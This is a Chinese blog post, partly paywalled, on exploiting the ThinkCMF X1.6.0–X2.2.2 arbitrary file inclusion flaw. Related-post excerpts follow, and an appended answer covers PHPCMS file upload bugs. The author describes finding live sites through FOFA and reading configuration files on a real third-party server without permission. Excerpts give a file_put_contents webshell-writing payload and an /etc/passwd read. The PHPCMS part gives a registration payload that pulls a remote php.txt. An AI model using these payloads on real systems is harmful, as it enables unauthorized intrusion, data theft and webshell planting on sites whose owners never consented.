ThinkCMF框架任意文件包含漏洞学习复现小记

ThinkCMF框架任意文件包含漏洞分析与复现
最新推荐文章于 2024-09-13 21:45:01 发布
原创 最新推荐文章于 2024-09-13 21:45:01 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了ThinkCMF框架在多个版本中存在的任意文件包含漏洞,介绍了漏洞的危害,展示了如何通过构造请求实现远程代码执行。作者通过实战演练,包括读取配置文件、写入PHP脚本并利用菜刀连接,揭示了漏洞的严重性。最后,分析了漏洞成因,并提出了修复方案,即限制display和fetch函数的访问权限。

前言

跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下

影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2

漏洞危害

任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。

实战

因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间,
在这里插入图片描述
下面就拿我费尽千辛万苦找到的一个站做一下笔记
首先尝试任意代码执行漏洞:
/?a=display&templateFile=README.md
在这里插入图片描述
尝试读取config.yaml配置文件
/?a=display&templateFile=config.yaml
这样就可以进行下一步了

最低0.47元/天 解锁文章
Junior_Q
关注
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1811
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMFthinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
ThinkCMF框架任意文件包含 漏洞复现
偷一个月亮
03-16 1158
0x01 简介 ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。 0x02 漏洞版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkC...
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2348
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
ThinkCMF 任意文件包含漏洞复现
weixin_43740200的博客
11-15 1003
这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。 搭建环境,放到服务器上。 先来试试读取README文件 http://127.0.0.1/?a=display&templateFile=REMADE.md kn1feemmm,好使,再来读读系统文件 http://127.0.0.1/?a=display&templateFile=/etc/pa...
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 1005
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞 ThinkCMF 是一种基于 PHP+MYSQL 开发的中文字内容管理框架,底层采用 ThinkPHP3.2.3 构建。ThinkCMF 提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的...
ThinkCMF框架任意内容包含漏洞分析复现
m0_48520508的博客
07-29 674
0x01简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 0x02漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 2175
thinkcmf-文件包含】public函数
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2172
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1593
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkCMF框架上的任意内容包含漏洞复现+分析
weixin_44897902的博客
11-16 1002
thinkcmf的任意内容包含漏洞
thinkcmf 文件包含 x1.6.0-x2.2.3
qq_23003811的博客
07-22 382
攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。1、漏洞验证,访问/test.php。
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 598
?>’)/shell.php?>’)
ThinkCMF上传漏洞
X__WY__X的博客
09-14 978
ThinkCMF上传漏洞 一.漏洞描述 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 二.漏洞原理 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 三.环境搭建 下载ThinkCMF X2.2.0 链接:https:
ThinkCMF框架任意内容包含漏洞的讲解
无问社区的博客
09-13 1896
本文来自无问社区,更多网安资料可前往查看ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。0x01 影响版本。
ThinkCMF v5.0.190111 后台代码执行漏洞复现
weixin_59086772的博客
12-15 3219
近期雨笋教育小编要经常来和大家分享渗透技术干货了,感兴趣的可以多多关注我们。 0x00前言 thinkcmf5.0.19 这个版本后台提供路由自定义, 其中路由的别名对单引号缺少过滤, 导致引发漏洞。 0x01环境搭建 官方github下载地址: https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip 将网站源码解压至phpstudy WEB目录下: C:\phpStudy\PHPTutorial 配置phpstudy实
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞学习
weixin_39967120的博客
12-22 399
前言:最近爆出来的漏洞ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 3906
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi
ThinkCMF框架修复漏洞 名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617)
M翠峰如簇的专栏
12-01 496
漏洞名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617) 漏洞造成的影响 由于ThinkPHP5框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell入侵服务器。 ThinkCMF框架用ThinkPHP5.011内核修复方法如下: /simplewind/thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上 if (!preg_match('/^[A-Za-z](\w.
phpcms任意文件上传漏洞复现
最新发布
09-10
复现phpcms任意文件上传漏洞可从不同场景和利用方式进行,以下是具体方法: ### 基于PHPCMS 9.6.0版本libs/classes/attachment.class.php文件漏洞漏洞源于PHPCMS程序在下载远程/本地文件时未对文件类型做正确校验,远程攻击者可利用该漏洞上传并执行任意的PHP代码[^1]。不过引用中未详细提及该场景下的复现步骤,通常需结合漏洞原理,构造恶意文件,利用程序在文件类型校验缺失的环节上传该文件来实现复现。 ### 绕过任意文件上传漏洞(压缩包文件递归删除) 代码实现了对解压后文件的检查,若文件后缀不在规定的 'jpg'、'gif'、'png' 范围内则会删除。以下是示例代码及复现思路: ```php function check_dir($dir){ $handle = opendir($dir); while(($f = readdir($handle)) !== false){ if(!in_array($f, array('.', '..'))){ if(is_dir($dir.$f)){ check_dir($dir.$f.'/'); }else{ $ext = strtolower(substr(strrchr($f, '.'), 1)); if(!in_array($ext, array('jpg', 'gif', 'png'))){ unlink($dir.$f); } } } } } ``` 复现思路:尝试构造包含非 'jpg'、'gif'、'png' 后缀文件的压缩包上传,观察是否能绕过该检查机制。 ### 利用注册处漏洞利用点 网上常用的一个payload如下: ```plaintext http://127.0.0.1/index.php?m=member&c=index&a=register&siteid= POST: siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://127.0.0.2/bx/php.txt?.php#.jpg>&dosubmit=1&protocol= ``` 复现步骤:在本地搭建好PHPCMS环境,将上述URL中的IP地址替换为本地实际IP,然后使用工具(如Burp Suite等)构造POST请求,发送该请求,观察是否能成功上传文件。 ### 压缩包文件无递归删除场景 示例代码如下: ```php $file = $_FILES['file']; if (!$file) { exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/'; $ext = strtolower(substr(strrchr($name, '.'), 1)); function check_dir($dir) { $handle = opendir($dir); while (($f = readdir($handle)) !== false) { if (!in_array($f, array('.', '..'))) { $ext = strtolower(substr(strrchr($f, '.'), 1)); if (!in_array($ext, array('jpg', 'gif', 'png'))) { unlink($dir . $f); } } } } if (!is_dir($dir)) { mkdir($dir); } $temp_dir = $dir . 'member/1/'; if (!is_dir($temp_dir)) { mkdir($temp_dir); } if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) { check_dir($dir); exit("解压失败"); } check_dir($temp_dir); exit('上传成功!'); } else { move_uploaded_file($file['tmp_name'], $temp_dir . '/' . $file['name']); check_dir($temp_dir); exit('上传成功!'); } } else { exit('仅允许上传zip、jpg、gif、png文件!'); } ``` 复现思路:按照代码逻辑,准备好符合要求的压缩包文件进行上传,观察是否能绕过文件类型检查和递归删除机制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值